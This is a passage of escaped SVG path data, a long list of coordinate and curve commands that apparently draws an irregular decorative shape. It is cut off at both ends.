d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5